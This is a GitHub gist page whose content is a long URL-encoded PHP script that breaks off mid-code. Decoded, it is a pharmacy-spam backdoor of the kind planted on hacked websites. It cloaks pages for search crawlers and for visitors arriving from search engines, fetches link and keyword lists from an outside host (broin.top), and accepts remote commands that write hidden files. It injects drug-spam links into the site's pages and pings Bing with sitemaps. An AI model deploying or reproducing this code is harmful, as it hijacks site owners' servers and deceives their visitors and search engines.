Skip to content

Instantly share code, notes, and snippets.

@nikitasius
Created February 16, 2017 21:03
Show Gist options
  • Save nikitasius/95e774e7f02b3bbf9c52b5fe78d18ce6 to your computer and use it in GitHub Desktop.
Save nikitasius/95e774e7f02b3bbf9c52b5fe78d18ce6 to your computer and use it in GitHub Desktop.
gogo%3C%3Fphp%0A%0A%40ini_set%28%22memory_limit%22%2C%20%221024M%22%29%3B%0A%40ini_set%28%27display_errors%27%2C%20%270%27%29%3B%0Aerror_reporting%280%29%3B%0A%24curtime%20%3D%20time%28%29%3B%0A%24hspan%20%3D%200%3B%0A%0Aif%20%28isset%28%24_REQUEST%5B%27pingurl%27%5D%29%29%20%7B%0A%20%20%20%20%24ping_url%20%3D%20rawurldecode%28%24_REQUEST%5B%27pingurl%27%5D%29%3B%0A%20%20%20%20die%28httpget%28%22http%3A%2F%2Fwww.bing.com%2Fwebmaster%2Fping.aspx%3FsiteMap%3D%7B%24ping_url%7D%22%29%29%3B%0A%7D%0Aif%20%28isset%28%24_REQUEST%5B%27pi2%27%5D%29%29%20%7B%0A%20%20%20%20die%28pi%28%29%20%2A%202%29%3B%0A%7D%0A%24ip%20%3D%20urlencode%28%24_SERVER%5B%27REMOTE_ADDR%27%5D%29%3B%0A%24ua%20%3D%20urlencode%28%24_SERVER%5B%27HTTP_USER_AGENT%27%5D%29%3B%0A%24ref%20%3D%20isset%28%24_SERVER%5B%27HTTP_REFERER%27%5D%29%20%3F%20urlencode%28%24_SERVER%5B%27HTTP_REFERER%27%5D%29%20%3A%20%27%27%3B%0A%24poiskoviki%20%3D%20%27%2Fgoogle%7Cyandex%7Cbing%7Cyahoo%7Caol%7Crambler%2Fi%27%3B%0A%24fromse%20%3D%200%3B%0Aif%20%28%24ref%20%26%26%20preg_match%28%24poiskoviki%2C%20%24ref%29%29%0A%20%20%20%20%24fromse%20%3D%201%3B%0A%24abt%20%3D%200%3B%0Aif%20%28isset%28%24_GET%5B%27debug%27%5D%29%29%0A%20%20%20%20%24abt%20%3D%201%3B%0A%24crawlers%20%3D%20%27%2Fgoogle%7Cbot%7Ccrawl%7Cslurp%7Cspider%7Cyandex%7Crambler%2Fi%27%3B%0Aif%20%28preg_match%28%24crawlers%2C%20%24ua%29%29%20%7B%0A%20%20%20%20%24abt%20%3D%201%3B%0A%7D%0Aif%20%28file_exists%28%22%7B%24eb%7D.bt%22%29%29%20%7B%0A%20%20%20%20%24bots%20%3D%20file%28%22%7B%24eb%7D.bt%22%2C%20FILE_IGNORE_NEW_LINES%20%7C%20FILE_SKIP_EMPTY_LINES%29%3B%0A%20%20%20%20%24btime%20%3D%20filemtime%28%22%7B%24eb%7D.bt%22%29%3B%0A%20%20%20%20%24obtime%20%3D%20%24curtime%20-%20%24btime%3B%0A%7D%0Aif%20%28%21%24bots%5B2%5D%20%7C%7C%20%24obtime%20%3E%20172800%29%20%7B%0A%20%20%20%20%24fbots%20%3D%20httpget%28%22http%3A%2F%2Fbroin.top%2Flnk%2Fbots.dat%22%29%3B%0A%20%20%20%20%24btf%20%3D%20fopen%28%22%7B%24eb%7D.bt%22%2C%20%27w%27%29%3B%0A%20%20%20%20fwrite%28%24btf%2C%20%24fbots%29%3B%0A%20%20%20%20fclose%28%24btf%29%3B%0A%20%20%20%20%24bots%20%3D%20file%28%22%7B%24eb%7D.bt%22%2C%20FILE_IGNORE_NEW_LINES%20%7C%20FILE_SKIP_EMPTY_LINES%29%3B%0A%7D%0Aif%20%28in_array%28%24ip%2C%20%24bots%29%29%20%7B%0A%20%20%20%20%24abt%20%3D%201%3B%0A%7D%0A%0A%24st%20%3D%20%27.st%27%3B%0A%24cldw%20%3D%200%3B%0A%24dw%20%3D%200%3B%0A%0Afunction%20el%28%24el%2C%20%24my_content%29%20%7B%0A%20%20%20%20if%20%28count%28%24el%29%20%3E%200%29%20%7B%0A%20%20%20%20%20%20%20%20foreach%20%28%24el%20as%20%24ln%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27%23%3Cstrong%3E%23%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cstrong%3E%23%27%2C%20%22_-strong-_%20%24ln%20%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28preg_match%28%27%23%3Cb%3E%23%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cb%3E%23%27%2C%20%22_-b-_%20%24ln%20%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28preg_match%28%27%23%3Ci%3E%23%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Ci%3E%23%27%2C%20%22_-i-_%20%24ln%20%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28preg_match%28%27%23%3Cu%3E%23%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cu%3E%23%27%2C%20%22_-u-_%20%24ln%20%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28preg_match%28%27%23%3Cp%28.%2A%29%3E%23%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cp%28.%2A%29%3E%23%27%2C%20%22_-p-_%20%5Cn%24ln%20%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28preg_match%28%27%23%3C%2Fp%3E%23%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3C%2Fp%3E%23%27%2C%20%22_-%2Fp-_%20%5Cn%24ln%20%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28preg_match%28%27%23%3Cbr%28.%2A%29%3E%23%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cbr%28.%2A%29%3E%23%27%2C%20%22%20%24ln%20%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28preg_match%28%27%23%3Cspan%28.%2A%29%3E%23%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cspan%28.%2A%29%3E%23%27%2C%20%22_-span-_%20%24ln%20%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28preg_match%28%27%23%3C%2Fbody%3E%23%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3C%2Fbody%3E%23%27%2C%20%22%24ln%3Cbr%3E%20%5Cn%3C%2Fbody%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%24my_content%20%3D%20str_replace%28%27_-%27%2C%20%27%3C%27%2C%20%24my_content%29%3B%0A%20%20%20%20%20%20%20%20%24my_content%20%3D%20str_replace%28%27-_%27%2C%20%27%3E%27%2C%20%24my_content%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20return%20%24my_content%3B%0A%7D%0A%0Aif%20%28isset%28%24_REQUEST%5B%22create%22%5D%29%29%20%7B%0A%20%20%20%20%24cldw%20%3D%200%3B%0A%20%20%20%20if%20%28%24_REQUEST%5B%27cldw%27%5D%29%0A%20%20%20%20%20%20%20%20%24cldw%20%3D%201%3B%0A%20%20%20%20%24qq%20%3D%20%24_REQUEST%5B%27qq%27%5D%3B%0A%20%20%20%20if%20%28%21file_exists%28%22%7B%24eb%7D%7B%24st%7D%2F.r%22%29%29%20%7B%0A%20%20%20%20%20%20%20%20%24qq%20%3D%20%24_REQUEST%5B%27qq%27%5D%3B%0A%20%20%20%20%20%20%20%20mkdir%28%22%7B%24eb%7D%7B%24st%7D%22%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20%24pamparam%20%3D%20file_get_contents%28%22%7B%24eb%7D%7B%24st%7D%2F.r%22%29%3B%0A%20%20%20%20%20%20%20%20%24eqq%20%3D%20explode%28%27%7C%27%2C%20%24pamparam%29%3B%0A%20%20%20%20%20%20%20%20if%20%28isset%28%24_REQUEST%5B%27qq%27%5D%29%20%26%26%20%24_REQUEST%5B%27qq%27%5D%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24qq%20%3D%20%24_REQUEST%5B%27qq%27%5D%3B%0A%20%20%20%20%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24qq%20%3D%20trim%28%24eqq%5B2%5D%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%20%20%24redir%20%3D%20%24_REQUEST%5B%27redir%27%5D%3B%0A%20%20%20%20%24redcode%20%3D%20%24_REQUEST%5B%27redcode%27%5D%3B%0A%20%20%20%20%24group%20%3D%20%24_REQUEST%5B%27group%27%5D%3B%0A%20%20%20%20if%20%28%24cldw%29%20%7B%0A%20%20%20%20%20%20%20%20%24keys%20%3D%20file%28%22http%3A%2F%2Fbroin.top%2Flnk%2Fgen%2Fkeys%2F%24group.keys%22%29%3B%0A%20%20%20%20%20%20%20%20shuffle%28%24keys%29%3B%0A%20%20%20%20%20%20%20%20%24clkeys%20%3D%20%27%27%3B%0A%20%20%20%20%20%20%20%20foreach%20%28%24keys%20as%20%24clkey%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24clkeys%20.%3D%20%24clkey%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20file_put_contents%28%22%7B%24eb%7D%7B%24st%7D%2F.k%22%2C%20%24clkeys%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20%24lang%20%3D%20%24_REQUEST%5B%27lang%27%5D%3B%0A%20%20%20%20file_put_contents%28%22%7B%24eb%7D%7B%24st%7D%2F.r%22%2C%20%22%24redir%7C%24group%7C%24qq%7C%24lang%7C%24redcode%7C%24cldw%22%29%3B%0A%20%20%20%20if%20%28file_exists%28%22%7B%24eb%7D%7B%24st%7D%2F.r%22%29%29%20%7B%0A%20%20%20%20%20%20%20%20echo%20%22sitecreated%22%3B%0A%20%20%20%20%20%20%20%20die%28%29%3B%0A%20%20%20%20%7D%0A%7D%0A%0Aif%20%28file_exists%28%22%7B%24eb%7D%7B%24st%7D%2F.r%22%29%29%20%7B%0A%20%20%20%20%24dw%20%3D%201%3B%0A%20%20%20%20%24pamparam%20%3D%20file_get_contents%28%22%7B%24eb%7D%7B%24st%7D%2F.r%22%29%3B%0A%20%20%20%20%24eqq%20%3D%20explode%28%27%7C%27%2C%20%24pamparam%29%3B%0A%20%20%20%20%24redir%20%3D%20%24eqq%5B0%5D%3B%0A%20%20%20%20if%20%28%21strstr%28%24redir%2C%20%27http%3A%2F%2F%27%29%29%0A%20%20%20%20%20%20%20%20%24redir%20%3D%20rawurldecode%28%24redir%29%3B%0A%20%20%20%20%24group%20%3D%20%24eqq%5B1%5D%3B%0A%20%20%20%20%24qq%20%3D%20trim%28%24eqq%5B2%5D%29%3B%0A%20%20%20%20%24lang%20%3D%20trim%28%24eqq%5B3%5D%29%3B%0A%20%20%20%20if%20%28%24eqq%5B4%5D%29%0A%20%20%20%20%20%20%20%20%24redcode%20%3D%20rawurldecode%28%24eqq%5B4%5D%29%3B%0A%20%20%20%20%24cldw%20%3D%20%24eqq%5B5%5D%3B%0A%7D%0A%0A%0Aif%20%28%24abt%20%7C%7C%20%24fromse%20%7C%7C%20%24redcode%20%7C%7C%20%24hspan%20%7C%7C%20isset%28%24_GET%5B%24qq%5D%29%29%20%7B%0A%20%20%20%20%24epills%20%3D%20explode%28%22%7C%22%2C%20%22abana%7Cabilify%7Cacai%7Caccutane%7Caceon%7Caciclovir%7Caciphex%7Cacivir%20pills%7Cacticin%7Cactonel%7Cactoplus%20met%7Cactos%7Cadalat%7Cadvair%20diskus%7Calavert%7Calbendazole%7Calbenza%7Caldactone%7Calesse%7Caleve%7Callegra%7Calli%7Callopurinol%7Calphagan%7Caltace%7Camantadine%7Camaryl%7Camitriptyline%7Camoxil%7Campicillin%7Canacin%7Canafranil%7Cantabuse%7Cantivert%7Capcalis%20sx%7Carava%7Caricept%7Carimidex%7Caristocort%7Carjuna%7Cartane%7Casacol%7Cashwagandha%7Caspirin%7Castelin%7Catarax%7Catorlip-10%7Catorlip-20%7Catorlip-5%7Catrovent%7Caugmentin%7Cavalide%7Cavandamet%7Cavapro%7Cavodart%7Caygestin%7Cayurslim%7Cazulfidine%7Cbaclofen%7Cbactrim%7Cbactroban%7Cbeconase%20aq%7Cbenadryl%7Cbenemid%7Cbenfotiamine%7Cbenicar%7Cbentyl%7Cbenzac%7Cbetapace%7Cbetnovate%7Cbetoptic%7Cbiaxin%7Cblopress%7Cbrafix%7Cbrahmi%7Cbrand%20advair%20diskus%7Cbrand%20amoxil%7Cbrand%20cialis%7Cbrand%20levitra%7Cbrand%20viagra%7Cbupron%20sr%7Cbupropion%7Cbuspar%7Cbystolic%7Ccabgolin%7Ccafergot%7Ccalan%7Ccalcium%20carbonate%7Ccapoten%7Ccarafate%7Ccarbozyne%7Ccardizem%7Ccardura%7Ccasodex%7Ccaverta%7Ccefadroxil%7Ccefixime%7Cceftin%7Cceladrin%7Ccelebrex%7Ccelexa%7Ccephalexin%7Cchloramphenicol%7Cchloromycetin%7Cchloroquine%7Ccholestoplex%7Ccialis%7Ccialis%20jelly%7Ccialis%20professional%7Ccialis%20soft%7Ccialis%20sublingual%7Ccialis%20super%20active%7Cciplox%7Ccipro%7Ccitalopram%7Cclaritin%7Ccleocin%7Ccleocin%20gel%7Cclomid%7Cclonidine%7Cclozaril%7Ccolchicine%7Ccolospa%7Ccombivent%7Ccompazine%7Cconfido%7Ccordarone%7Ccoreg%7Ccoumadin%7Ccozaar%7Ccrestor%7Ccyklokapron%7Ccymbalta%7Ccystone%7Ccytotec%7Ccytoxan%7Cdanazol%7Cdapoxetine%7Cdecadron%7Cdeltasone%7Cdepakote%7Cdesyrel%7Cdetrol%7Cdiabecon%7Cdiakof%7Cdiamox%7Cdiarex%7Cdiclofenac%7Cdiclofenac%20gel%7Cdifferin%7Cdiflucan%7Cdigoxin%7Cdilantin%7Cdiltiazem%7Cdiovan%7Cdipyridamole%7Cditropan%7Cdostinex%7Cdoxazosin%7Cdoxycycline%7Cdramamine%7Cduetact%7Cdulcolax%7Cduphalac%7Cdutas%7Ceffexor%20xr%7Celavil%7Celdepryl%7Celimite%7Celocon%7Cemsam%7Cendep%7Centocort%7Cephedraxin%7Cepivir-hbv%7Cerexin-v%7Cerythromycin%7Cestrace%7Cethionamide%7Cetodolac%7Ceulexin%7Ceurax%7Cevecare%7Cevista%7Cexelon%7Cfamvir%7Cfeldene%7Cfemale%20cialis%7Cfemale%20viagra%7Cfemara%7Cfemcare%7Cfertomid%7Cfinast%7Cfinax%7Cfincar%7Cfinpecia%7Cflagyl%20er%7Cflomax%7Cflonase%7Cflorinef%7Cflovent%7Cfloxin%7Cfluoxetine%7Cfml%20forte%7Cforzest%7Cfosamax%7Cfucidin%7Cfurosemide%7Cgasex%7Cgeriforte%7Cgeriforte%20syrup%7Cginette-35%7Cginseng%7Cglucophage%7Cglucotrol%20xl%7Cglycomet%7Cglyset%7Cgrifulvin%20v%7Cgyne-lotrimin%7Chaldol%7Charidra%7Chimcocid%7Chimcolin%7Chimplasia%7Choodia%7Chyaluronic%20acid%7Chydrea%7Chydrochlorothiazide%7Chytrin%7Chyzaar%7Cimitrex%7Cimuran%7Cinderal%7Cindinavir%7Cindocin%7Cinnopran%20xl%7Cisoniazid%7Cisoptin%7Cjanuvia%7Ckamagra%7Ckamagra%20chewable%7Ckamagra%20gold%7Ckamagra%20oral%20jelly%7Ckamagra%20soft%7Ckeflex%7Ckeftab%7Ckeppra%7Ckytril%7Cl-tryptophan%7Clady%20era%7Clamictal%7Clamisil%7Clanoxin%7Clariam%7Clasix%7Clasuna%7Clevaquin%7Clevitra%7Clevitra%20plus%7Clevitra%20professional%7Clevitra%20super%20active%7Clevlen%7Clevothroid%7Clexapro%7Clincocin%7Clioresal%7Clipitor%7Cliposafe%7Clipothin%7Clisinopril%7Clithium%7Cliv%2052%7Clopid%7Clopressor%7Clotensin%7Clotrisone%7Clozol%7Clukol%7Cluvox%7Clynoral%7Cmalegra%20dxt%7Cmalegra%20fxt%7Cmaxalt%7Cmaxaman%7Cmeclizine%7Cmedrol%7Cmenosan%7Cmentat%7Cmentat%20ds%20syrup%7Cmentax%7Cmestinon%7Cmetformin%7Cmethotrexate%7Cmetoclopramide%7Cmevacor%7Cmicardis%7Cmicronase%7Cmidamor%7Cminipress%7Cminocin%7Cminocycline%7Cminomycin%7Cmirapex%7Cmircette%7Cmobic%7Cmoduretic%7Cmotilium%7Cmotrin%7Cmyambutol%7Cmycelex-g%7Cnaprosyn%7Cneurontin%7Cnexium%7Cnimotop%7Cnitrofurantoin%7Cnitroglycerin%7Cnizagara%7Cnizoral%7Cnolvadex%7Cnootropil%7Cnoroxin%7Cnorvasc%7Cnymphomax%7Colanzapine%7Comnicef%7Cophthacare%7Corlistat%7Coxytrol%7Cpamelor%7Cpariet%7Cparlodel%7Cparoxetine%7Cpaxil%7Cpenegra%7Cperiactin%7Cphenamax%7Cphenergan%7Cphexin%7Cpilex%7Cplavix%7Cplendil%7Cpletal%7Cponstel%7Cprandin%7Cpravachol%7Cprazosin%7Cprecose%7Cprednisolone%7Cprednisone%7Cpremarin%7Cprevacid%7Cprilosec%7Cprinivil%7Cprobalan%7Cprocardia%7Cprograf%7Cpromethazine%7Cprometrium%7Cpropecia%7Cpropranolol%7Cproscar%7Cprotonix%7Cproventil%7Cprovera%7Cpulmicort%7Cpurim%7Cpurinethol%7Cpyridium%7Cquibron-t%7Cralista%7Cranitidine%7Creglan%7Crelafen%7Cremeron%7Creminyl%7Crenagel%7Crequip%7Cretin-a%200%252c025%7Cretin-a%200%252c05%7Cretin-a%20gel%200%252c1%7Cretino-a%20cream%200%252c025%7Cretino-a%20cream%200%252c05%7Crevatio%7Crhinocort%7Crisperdal%7Crobaxin%7Crocaltrol%7Crogaine%202%7Crogaine%205%7Crosuvastatin%7Croxithromycin%7Crumalaya%7Crumalaya%20forte%7Crumalaya%20gel%7Crumalaya%20liniment%7Csarafem%7Csaw%20palmetto%7Cseptilin%7Cserevent%7Cseroflo%7Cserophene%7Cseroquel%7Cserpina%7Cshallaki%7Cshatavari%7Cshuddha%20guggulu%7Csilagra%7Csinemet%7Csinequan%7Csingulair%7Cskelaxin%7Csnovitra%20super%20power%7Csominex%7Cspeman%7Cstarlix%7Cstrattera%7Cstromectol%7Cstyplon%7Csuhagra%7Csumycin%7Csuprax%7Csustiva%7Csynthroid%7Ctadacip%7Ctadalis%20sx%7Ctadapox%7Ctamoxifen%7Ctegretol%7Ctenormin%7Cterramycin%7Ctetracycline%7Ctinidazole%7Ctofranil%7Ctopamax%7Ctoprol%20xl%7Ctoradol%7Ctorsemide%7Ctrandate%7Ctrazodone%7Ctrental%7Ctretinoin%200%252c025%7Ctretinoin%200%252c05%7Ctrial%20ed%20set%20extreme%7Ctrial%20ed%20set%20lite%7Ctrial%20ed%20set%20standart%7Ctriamterene%7Ctricor%7Ctrileptal%7Ctrimox%7Ctulasi%7Cunisom%7Curispas%7Curoxatral%7Cv-gel%7Cvaltrex%7Cvantin%7Cvasodilan%7Cvasotec%7Cvenlor%7Cventolin%7Cvermox%7Cviagra%7Cviagra%20jelly%7Cviagra%20plus%7Cviagra%20professional%7Cviagra%20soft%7Cviagra%20sublingual%7Cviagra%20super%20active%7Cviramune%7Cvoltaren%7Cvoveran%7Cvoveran%20sr%7Cvpxl%7Cvytorin%7Cwellbutrin%7Cwellbutrin%20sr%7Cxalatan%7Cxeloda%7Cxenical%7Cyagara%7Cyasmin%7Czaditor%7Czanaflex%7Czantac%7Czebeta%7Czenegra%7Czerit%7Czestoretic%7Czestril%7Czetia%7Czithromax%7Czocor%7Czofran%7Czoloft%7Czovirax%7Czyban%7Czyloprim%7Czyprexa%7Czyrtec%7Czyvox%22%29%3B%0A%20%20%20%20%24tdpill%20%3D%20%27pills%27%3B%0A%20%20%20%20%24donor%20%3D%20%24_SERVER%5B%27HTTP_HOST%27%5D%20.%20%24_SERVER%5B%27REQUEST_URI%27%5D%3B%0A%20%20%20%20%24ddomain%20%3D%20%24_SERVER%5B%27SERVER_NAME%27%5D%3B%0A%20%20%20%20%24ddomain%20%3D%20str_ireplace%28%27www.%27%2C%20%27%27%2C%20%24ddomain%29%3B%0A%20%20%20%20%24donor%20%3D%20str_ireplace%28%27www.%27%2C%20%27%27%2C%20%24donor%29%3B%0A%20%20%20%20%24page%20%3D%20str_replace%28%27%2F%27%2C%20%27%7C%27%2C%20%24donor%29%3B%0A%20%20%20%20%24donor%20%3D%20urldecode%28%24donor%29%3B%0A%20%20%20%20%24epage%20%3D%20explode%28%27%7C%27%2C%20%24page%29%3B%0A%20%20%20%20if%20%28%24_SERVER%5B%27SERVER_PORT%27%5D%20%21%3D%2080%29%20%7B%0A%20%20%20%20%20%20%20%20%24ddomain%20.%3D%20%22%3A%7B%24_SERVER%5B%27SERVER_PORT%27%5D%7D%22%3B%0A%20%20%20%20%7D%0A%20%20%20%20if%20%28%24_GET%5B%24qq%5D%20%3D%3D%20%27sitemap.xml%27%20OR%20%24_GET%5B%24qq%5D%20%3D%3D%20%27rss%27%29%20%7B%0A%20%20%20%20%20%20%20%20%24fpath%20%3D%20%22%7B%24eb%7D%7B%24st%7D%2F%7B%24_GET%5B%24qq%5D%7D%22%3B%0A%20%20%20%20%20%20%20%20%24s_url%20%3D%20%22http%3A%2F%2Fbroin.top%2Flnk%2Fxml.php%3Fd%3D%7B%24ddomain%7D%26mode%3D%7B%24_GET%5B%24qq%5D%7D%26param%3D%7B%24qq%7D%22%3B%0A%20%20%20%20%20%20%20%20if%20%28file_exists%28%24fpath%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24content%20%3D%20file_get_contents%28%24fpath%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28time%28%29%20-%20filemtime%28%24fpath%29%20%3E%203600%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24page%20%3D%20httpget%28%24s_url%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24page%20%21%3D%20%24content%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28substr%28%24page%2C%200%2C%205%29%20%3D%3D%20%27%3C%3Fxml%27%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24content%20%3D%20%24page%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20file_put_contents%28%24fpath%2C%20%24page%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24res%20%3D%20httpget%28%22http%3A%2F%2Fwww.bing.com%2Fwebmaster%2Fping.aspx%3FsiteMap%3Dhttp%3A%2F%2F%7B%24ddomain%7D%2F%3F%7B%24qq%7D%3D%7B%24_GET%5B%24qq%5D%7D%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20die%28%24content%29%3B%0A%20%20%20%20%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24page%20%3D%20httpget%28%24s_url%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28substr%28%24page%2C%200%2C%205%29%20%3D%3D%20%27%3C%3Fxml%27%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20file_put_contents%28%24fpath%2C%20%24page%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20die%28%24page%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%20%20%24morda%20%3D%200%3B%0A%20%20%20%20if%20%28%21%24epage%5B1%5D%20%26%26%20%21%24epage%5B2%5D%20%7C%7C%20%24epage%5B1%5D%20%3D%3D%20%27index.php%27%20%7C%7C%20%24epage%5B1%5D%20%3D%3D%20%27%3Fp%3Dhome%27%29%0A%20%20%20%20%20%20%20%20%24morda%20%3D%201%3B%0A%0A%20%20%20%20%24el%20%3D%20array%28%29%3B%0A%20%20%20%20if%20%28isset%28%24_GET%5B%24qq%5D%29%29%20%7B%0A%20%20%20%20%20%20%20%20%24ll%20%3D%20httpget%28%22http%3A%2F%2Fbroin.top%2Flnk%2Ftuktuk.php%3Fd%3D%24donor%26cldw%3D%24cldw%26only_v%3D1%22%29%3B%0A%20%20%20%20%20%20%20%20%24el%20%3D%20explode%28%22%5Cn%22%2C%20%24ll%29%3B%0A%20%20%20%20%7D%20elseif%20%28%24abt%20%7C%7C%20%24hspan%29%20%7B%0A%20%20%20%20%20%20%20%20%24ll%20%3D%20httpget%28%22http%3A%2F%2Fbroin.top%2Flnk%2Ftuktuk.php%3Fd%3D%24donor%26cldw%3D%24cldw%22%29%3B%0A%20%20%20%20%20%20%20%20%24el%20%3D%20explode%28%22%5Cn%22%2C%20%24ll%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20if%20%28file_exists%28%22%7B%24eb%7D%7B%24st%7D%2F%24page.html%22%29%29%20%7B%0A%20%20%20%20%20%20%20%20%24htmlpage%20%3D%20file_get_contents%28%22%7B%24eb%7D%7B%24st%7D%2F%24page.html%22%29%3B%0A%20%20%20%20%20%20%20%20print%20%24htmlpage%3B%0A%20%20%20%20%20%20%20%20exit%3B%0A%20%20%20%20%7D%0A%20%20%20%20if%20%28file_exists%28%22%7B%24eb%7D%7B%24st%7D%2F%24page.txt%22%29%29%20%7B%0A%20%20%20%20%20%20%20%20%24gtxt%20%3D%20file_get_contents%28%22%7B%24eb%7D%7B%24st%7D%2F%24page.txt%22%29%3B%0A%20%20%20%20%20%20%20%20%24etxt%20%3D%20explode%28%27%40%40%40%27%2C%20%24gtxt%29%3B%0A%20%20%20%20%20%20%20%20%24key%20%3D%20%24etxt%5B0%5D%3B%0A%20%20%20%20%20%20%20%20foreach%20%28%24epills%20as%20%24pill%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24pill%20%3D%20trim%28%24pill%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28stristr%28%24key%2C%20%24pill%29%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24tdpill%20%3D%20str_replace%28%27%20%27%2C%20%27%2B%27%2C%20%24pill%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%24desc%20%3D%20%24etxt%5B1%5D%3B%0A%20%20%20%20%20%20%20%20%24txt%20%3D%20%24etxt%5B2%5D%3B%0A%20%20%20%20%20%20%20%20%24h1%20%3D%20%24etxt%5B3%5D%3B%0A%20%20%20%20%7D%20elseif%20%28%24cldw%20%7C%7C%20isset%28%24_GET%5B%24qq%5D%29%29%20%7B%0A%20%20%20%20%20%20%20%20%24desc%20%3D%20%27%27%3B%0A%20%20%20%20%20%20%20%20%24keys%20%3D%20%40file%28%22%7B%24eb%7D%7B%24st%7D%2F.k%22%2C%20FILE_SKIP_EMPTY_LINES%20%7C%20FILE_IGNORE_NEW_LINES%29%3B%0A%20%20%20%20%20%20%20%20if%20%28%24keys%5B0%5D%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24key%20%3D%20%24keys%5B0%5D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20for%20%28%24kk%20%3D%201%3B%20%24kk%20%3C%20count%28%24keys%29%3B%20%24kk%2B%2B%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24newkeys%20.%3D%20%22%24keys%5B%24kk%5D%5Cn%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20file_put_contents%28%22%7B%24eb%7D%7B%24st%7D%2F.k%22%2C%20%24newkeys%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%20%28isset%28%24_GET%5B%24qq%5D%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24key%20%3D%20str_replace%28%27-%27%2C%20%27%20%27%2C%20%24_GET%5B%24qq%5D%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%20%28%24key%29%20%7B%0A%20%20%20%20%2